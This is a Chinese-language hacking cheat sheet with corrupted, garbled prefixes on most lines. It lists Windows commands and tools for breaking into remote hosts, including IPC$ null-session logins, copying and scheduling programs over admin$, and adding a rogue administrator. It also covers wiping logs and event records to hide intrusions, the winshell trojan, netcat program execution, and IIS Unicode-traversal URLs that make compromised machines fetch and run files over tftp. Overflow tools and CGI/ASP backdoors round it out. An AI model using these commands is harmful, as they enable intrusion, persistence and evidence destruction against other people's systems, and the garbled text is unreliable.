网管和黑客都必须知道的命令
ai�m\�3�y~ 常用的几条NET命令:
w'��(�/d�r +m�%%B�z>� (与远程主机建立空管连接) net use \\IP地址\ipc$ "" /use:""
�E|f[�#+:+ Ha-]�U:Vcx (以管理员身份登录远程主机) net use \\IP地址\ipc$ "密码" /use:"Administrator"
U[f00m5{HV ?�$109wZ:9 (传送文件到远程主机WINNT目录下)copy 本机目录路径\程序 \\IP地址\admin$
N5=BjXS�Ag 1Y'��4 g3T (查看远程主机时间) net time \\IP地址
nPXP9wmh4x �R��*D<M3� (定时启动某个程序) at \\IP地址 02:18 readme.exe
}�l7+W��4~ r�l%,9�JD! (查看共享) net view \\IP地址
PmE)FthdP( @!f4>iUy� (查看netbios工作组列表) nbtstat -A IP地址
NgGMsE�\C} q%d����G>! (将远程主机C盘映射为自己的F盘) net use f: \\IP地址\c$ ""/user:"Administrator"
-�� /\�qGI �;z4F-SY�Q (这两条把自己增加到管理员组): net user 用户名 密码 /add
"g���^i��% l�fc&#G�i3 net localgroup Administrators 用户名 /add
w7?f��J")
��G�m���Wr (断开连接) net use \\IP地址\ipc$ /delete
�P+hc�j
p* ~/`/r%1/J� 扫尾:
H\ejW@<�;h m�fQ#n!{ZH del C:\winnt\system32\logfiles\*.*
��vNGE]+QX !Rl|o^Vw>{ del C:\winnt\ssytem32\config\*.evt
D�:/ n2_� �gfg�,V�.: del C:\winnt\system32\dtclog\*.*
�*�tF~CG$r wL?U�p>fr� del C:\winnt\system32\*.log
o2ggHZe/=@ Bxm���,?=h del C:\winnt\system32\*.txt
(CxA5�u1|l :uo1QavO@, del C:\winnt\*.txt
f*��X��CWr R}=5:)%��w del C:\winnt\*.log
M�-"j�8:en _K~h�?
�\u 一、netsvc.exe
LN5LT'CE � DYr#?} 40� 下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务:
��4@?0w��V #4'wF4DR@� netsvc /list \\IP地址
��pd�'��0| .Az36wD�� netsvc schedule \\IP地址 /query
�E?XaU~cpc ! d�z�gi: netsvc \\IP地址 schedule /start
c�}o 6Rm50 "17)`Y��f 二、OpenTelnet.exe
pD$4nH4KST I�y9hBAg\y 远程启动主机的Telnet服务,并绑定端口到7878,例如:
c
3QgX�4vq Vy�xYv-$Y� OpenTelnet \\IP地址 用户名 密码 1 7878
1XSnn�k�Jm P�q�om�i!1 然后就可以telnet到主机的7878端口,进入DOS方式下:
p�,�fV .5q =�*,��S�D� telnet IP地址 7878
K?^;|�m-�� `-L?x�2)U 三、winshell.exe
dM�-cQo�: �1(?4*v@�B 一个非常小的木马(不到6K),telnet到主机的7878端口,输入密码winshell,当看到CMD>后,可打下面的命令:
�^&�eF916H ,@ �8+%KqG p Path (查看winshell主程序的路径信息)
(gBKC]zvz3 iNA�3��Y�� b reBoot (重新启动机器)
�+NPL.�b�| lhN@��,��q d shutDown (关闭机器)
�V*4Z.3/E5 �&F&`��y� s Shell (执行后你就会看到可爱的“C:\>”)
k6K�c{kY�� f�c9;��ZX7 x eXit (退出本次登录会话,此命令并不终止winshell的运行)
8v"�rM�
>[ �e�bk>e*� CMD>
http://.../srv.exe (通过http下载其他网站上的文件到运行winshell的机器上)
EU�?qL�j': Y.viO��HL 四、3389登陆器,GUI方式登录远程主机的
�qk�(Ey�p [A-��_?#cZ 五、elsave.exe
N��n. 9�J� dDa��V2:4E 事件日志清除工具
K~�
eak�\= D|LO��!,=b elsave -s \\IP地址 -l "application" -C
OM\J4"YV�$ b{�A[\� "� elsave -s \\IP地址 -l "system" -C
J6Z[���c*W �2Xt4Rqk�$ elsave -s \\IP地址 -l "security" -C
�@k?�v�b�q Q�Hk\����Z 执行后成功清除应用程序日志,系统日志,安全日志
�}�e[� E� v"bW�Vc~H 六、hbulot.exe
,"%�C�.9�a ��/s�\ m�V 开启win2kserver和winxp的3389服务
}T?X6LA$I8 �}�Ce9�R2
hbulot [/r]
�7OV�^>"�S fq7#�rZCxX 使用/r表示安装完成后自动重起目标使设置生效。
"Oxr}�^% i hLO)-u�eb� 七、nc.exe(netcat.exe)
y���E$P�LM �%6m�/�v�e 一个很好的工具,一些脚本程序都要用到它,也可做溢出后的连接用。
uw�NJ����M ,-c,3/tyA 想要连接到某处: nc [-options] hostname port[s] [ports] ...
6�6v��,/#K 7d:�]�o��> 绑定端口等待连接: nc -l -p port [-options] [hostname] [port]
/G||_��Hc > G\0Z[<v, 参数:
�gQ+]�N*.� jRK}H*u�em -e prog 程序重定向,一旦连接,就执行 [危险!!]
Y �<6|z3�� R|s�t�<P�� -g gateway source-routing hop point[s], up to 8
��U��4�!bW #�"gt�&t9Q -G num source-routing pointer: 4, 8, 12, ...
8Y�`Lq$u� }.��&n�Ei` -h 帮助信息
c�lE�9I<1v �n�1�-p/a. -i secs 延时的间隔
jl,�gqMn"V �/���;`H ) -l 监听模式,用于入站连接
E)v~kC�}7. t�����7Q$ -n 指定数字的IP地址,不能用hostname
Y)r�K'O�Y' -^@FZ�R^Y� -o file 记录16进制的传输
Y ��6a`�{' MP%�#)O6� -p port 本地端口号
|L<J�OQ� �RNT�9M:�w -r 任意指定本地及远程端口
|�Xso}Y�{ NQ�dwj�>_a -s addr 本地源地址
_}l(i1o,/ |�+�cz\�+ -u UDP模式
5a�Q)qUgAW Ua1&eC�Zi -v 详细输出——用两个-v可得到更详细的内容
Vk�6��c^/v Etz#+R&�*� -w secs timeout的时间
V6g*�"e/8 )�PYPlSQ*V -z 将输入输出关掉——用于扫描时
y,D9O�/VP� 八、TFTPD32.EXE
aHhLz�>H�' ��
?8>a;0� 把自己的电脑临时变为一台FTP服务器,让肉鸡来下载文件,tftp命令要在肉鸡上执行,通常要利用Unicode漏洞或telnet到肉鸡,例如:
=�E-x0�sr? '@n"'vks(\ http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本机IP地址 get 文件名 c:\winnt\system32\文件名
/�`PYk]mJh {wS�i?;[Gq 然后可以直接令文件运行:
x �ytrd�.� *p�{p.%Qs: http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名
�o�dP<��S. o@Ye_aM~?Y 九、prihack.exe是IIS的printer远程缓冲区溢出工具。idqover.exe是溢出idq的,选择“溢出后在一个端口监听”,然后用telnet连接它的监听端口,如果溢出成功,一连它的端口,绑定的命令马上执行。xploit.exe是一个图形界面的ida溢出,成功以后winxp下需要打winxp。
1[egCC\Mo_ dwA�"QVp�{ 一○、ntis.exe、cmd.exe和cmdasp.asp是三个cgi-backdoor,exe要放到cgi-bin目录下,asp放到有ASP执行权限的目录。然后用IE浏览器连接。
��)."ob�=m 1�$����*8F 一、一 Xscan命令行运行参数说明:
M�K#��
��� 9i�h�g[k�� 在检测过程中,按"[空格]"键可以查看各线程状态及扫描进度,按"q"键保存当前数据后提前退出程序,按"<ctrl+c>"强行关闭程序。
gwj?.7N*k x��\yM|WGL 1.命令格式: xscan -host <起始IP>[-<终止IP>] <检测项目> [其他选项]
}QE.|.fA1� �;}B=�g�/C xscan -file <主机列表文件名> <检测项目> [其他选项]
m$8s�iF{<q �ZU\$x�<,� 其中<检测项目> 含义如下:
Js�Y,Q,D q Ws2q�/[\oz -port : 检测常用服务的端口状态(可通过\dat\config.ini文件的"PORT-SCAN-OPTIONS\PORT-LIST"项定制待检测端口列表);
v^9eTeF�O � 7�[Us.V@ -ftp : 检测FTP弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
6i/unwe!`) bb_elm�b)n -ntpass : 检测NT-Server弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
�[v1$L�p z�~�H1f$} -cgi : 检测CGI漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
g@H�<Q('fJ @rhS[^1wi+ -iis : 检测IIS漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
1jC85^1Taq OT�y!Q,0$. [其他选项] 含义如下:
zw<<st� Bp uP9b^L�EoN -v: 显示详细扫描进度
4��H 6t" X h�,�[L6-�n -p: 跳过Ping不通的主机
z����%�}"= o�$�@/@r�� -o: 跳过没有检测到开放端口的主机
{���4+/0\� :!i=g�+e�] -t <并发线程数量[,并发主机数量]>: 指定最大并发线程数量和并发主机数量, 默认数量为100,10
